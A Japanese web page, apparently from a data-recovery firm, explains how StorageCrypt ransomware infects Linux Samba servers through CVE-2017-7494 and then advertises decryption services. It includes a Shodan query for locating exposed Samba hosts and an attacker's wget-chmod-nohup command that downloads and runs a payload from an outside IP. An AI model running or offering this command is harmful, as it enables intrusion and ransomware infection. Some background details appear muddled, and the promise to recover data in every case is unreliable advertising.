身代金要求ファイル「_READ_ME_for_DECRYPT.txt」
脆弱性SambaCryを利用してLinuxサーバーに感染するStorageCryptランサムウェアです。
SambaCryを利用したツールは、2017年3月26日にShadow Brokersによって公開されたハッキングツール「ELF_SHELLBIND.A」に含まれています。
脆弱性SambaCryとは、2010年3月から確認されていた脆弱性「CVE-2017-7494」です。
この脆弱性は、Linux上の共有フォルダが書き込み可になっている場合に、アップロードした共有ライブララリの実行が行え、shellを起動させる事によりコマンド実行ができます。
Samba3.5.0以降の全てにおいて、この脆弱性があります。
但し、2017年5月にSamba開発チームから更新プログラムが提供されました。しかし、ハッキングは続いています。
WannaCryがこの脆弱性を利用したことから「SambaCry」と呼ばれるようになりました。
ハッキングの手法としては、例えば、「Shodan」検索を用いた場合、「samba」と「port:445」の検索条件でSambaのIPを特定できます。
その後
wget -0 /tmp/apaceha http://45.76.102.45/sambacry && chmod +x /tmp/apaceha &&nohup /tmp/apaceha >/dev/null 2>&1 &
を実行してきます。
StorageCryptランサムウェアはデータファイルを「.locked」拡張子に変えて暗号化してしまいます。
身代金要求ファイル「_READ_ME_for_DECRYPT.txt」を置いていきます。
新しく見つかったStorageCryptランサムウェアは、共有フォルダにAutorun.infファイルとWinGame.exeを置いていきます。
これを実行することにより、CloudサービスをしているLinuxサーバー上で感染および暗号化をしていきます。
当社では、暗号化されたファイルを元に戻す復号サービスとランサムウェアの破壊活動に対応したデータ復旧サービスを行っています。
市販されているデータ復旧ソフトではできない暗号化される前のファイルの取得ができます。
ランサムウェア対応データ復旧サービスは安価に設定していますので小規模事業所、個人様にもご利用していただけるようにしています。
どのようなケースであってもデータを戻す復号サービスをしています。お困りの方はご連絡下さい。